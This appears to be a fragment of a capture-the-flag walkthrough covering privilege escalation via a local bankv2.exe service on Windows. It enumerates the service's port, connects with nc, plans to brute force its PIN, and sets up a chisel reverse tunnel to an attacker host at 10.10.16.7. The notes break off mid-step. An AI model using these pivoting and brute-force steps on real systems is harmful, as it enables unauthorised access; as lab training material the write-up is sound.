5 privesc bankv2.exe
# as bankv2.exe is running process
C:\Users\Public>tasklist | find "bankv2.exe"
tasklist | find "bankv2.exe"
bankv2.exe 1608 0 132 K
# PID=1608
C:\Users\Public>netstat -anop tcp | find "1608"
netstat -anop tcp | find "1608"
TCP 0.0.0.0:910 0.0.0.0:0 LISTENING 1608
# cannot connect to 910 from kali
# transferred nc and locally i can connect
C:\Users\Public>nc -vn 127.0.0.1 910
nc -vn 127.0.0.1 910
(UNKNOWN) [127.0.0.1] 910 (?) open
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church
v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 6969
[!] Access denied, disconnecting client....
too many output retries: CONNABORTED
# its a 4 digit PIN, lets brute force
# with port forwarding
# server
$ chisel server -p 8000 --reverse
# client
C:\Users\Public>chisel.exe client 10.10.16.7:8000 R:910:127.0.0.1:910
chisel.exe client 10.10.16.7:8000 R:910:127.0.0.1:910
2021/10/01 00:50:36 client: Connecting to ws://10.10.16.7:8000
2021/10/01 00:50:37 client: Connected (Latency 70.632ms)
Last updated